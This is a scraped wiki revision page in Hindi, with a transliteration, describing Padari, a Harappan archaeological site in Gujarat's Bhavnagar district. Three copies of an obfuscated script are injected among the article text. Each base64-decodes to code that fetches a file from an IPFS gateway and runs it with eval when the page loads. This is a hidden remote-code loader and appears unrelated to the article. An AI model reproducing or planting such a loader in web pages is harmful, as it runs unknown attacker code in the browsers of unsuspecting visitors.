Difference between revisions of "पडरी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Adding category Category:गुजरात के ऐतिहासिक स्थान (को हटा दिया गया हैं।))
 
(3 intermediate revisions by 2 users not shown)
Line 1: Line 1:
 
*पडरी [[गुजरात]] के भावनगर ज़िले में स्थित है।  
 
*पडरी [[गुजरात]] के भावनगर ज़िले में स्थित है।  
*पडरी से [[हड़प्पा|हड़प्पाई]] नगर, हड़प्पा पूर्व व विकसित हड़प्पा काल के दो [[संस्कृति|सांस्कृतिक]] चरणों को स्पष्ट करता है।  
+
*पडरी [[हड़प्पा|हड़प्पाई]] नगर, हड़प्पा पूर्व व विकसित हड़प्पा काल के दो [[संस्कृति|सांस्कृतिक]] चरणों को स्पष्ट करता है।  
 
*यहाँ से प्राप्त एक दूसरे से अंदर से जुड़े हुए नौ कमरों का परिसर विशेष महत्त्व का है, जो सामूहिकता के साथ-साथ सहयोग का भी प्रतीत है।  
 
*यहाँ से प्राप्त एक दूसरे से अंदर से जुड़े हुए नौ कमरों का परिसर विशेष महत्त्व का है, जो सामूहिकता के साथ-साथ सहयोग का भी प्रतीत है।  
 
*यहाँ के बर्तन के ठीकरों पर [[हड़प्पा लिपि|हड़प्पाई लिपि]] प्राप्त हुई है, साथ ही तीन विशिष्ट चित्रित भाण्ड व [[ताँबा|ताँबे]] की कलात्मक वस्तुएँ प्राप्त हुई हैं।   
 
*यहाँ के बर्तन के ठीकरों पर [[हड़प्पा लिपि|हड़प्पाई लिपि]] प्राप्त हुई है, साथ ही तीन विशिष्ट चित्रित भाण्ड व [[ताँबा|ताँबे]] की कलात्मक वस्तुएँ प्राप्त हुई हैं।   
Line 16: Line 16:
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
[[Category:नया पन्ना]]
+
==संबंधित लेख==
 +
{{गुजरात के ऐतिहासिक स्थान}}
 
[[Category:गुजरात]]
 
[[Category:गुजरात]]
 
[[Category:गुजरात के ऐतिहासिक नगर]]
 
[[Category:गुजरात के ऐतिहासिक नगर]]
 
[[Category:गुजरात के ऐतिहासिक स्थान]]
 
[[Category:गुजरात के ऐतिहासिक स्थान]]
 +
[[Category:हड़प्पा संस्कृति]]
 +
[[Category:इतिहास कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 10:12, 18 April 2011

  • padari gujarat ke bhavanagar zile mean sthit hai.
  • padari h dappaee nagar, h dappa poorv v vikasit h dappa kal ke do saanskritik charanoan ko spasht karata hai.
  • yahaan se prapt ek doosare se aandar se ju de hue nau kamaroan ka parisar vishesh mahattv ka hai, jo samoohikata ke sath-sath sahayog ka bhi pratit hai.
  • yahaan ke bartan ke thikaroan par h dappaee lipi prapt huee hai, sath hi tin vishisht chitrit bhand v taanbe ki kalatmak vastuean prapt huee haian.



panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>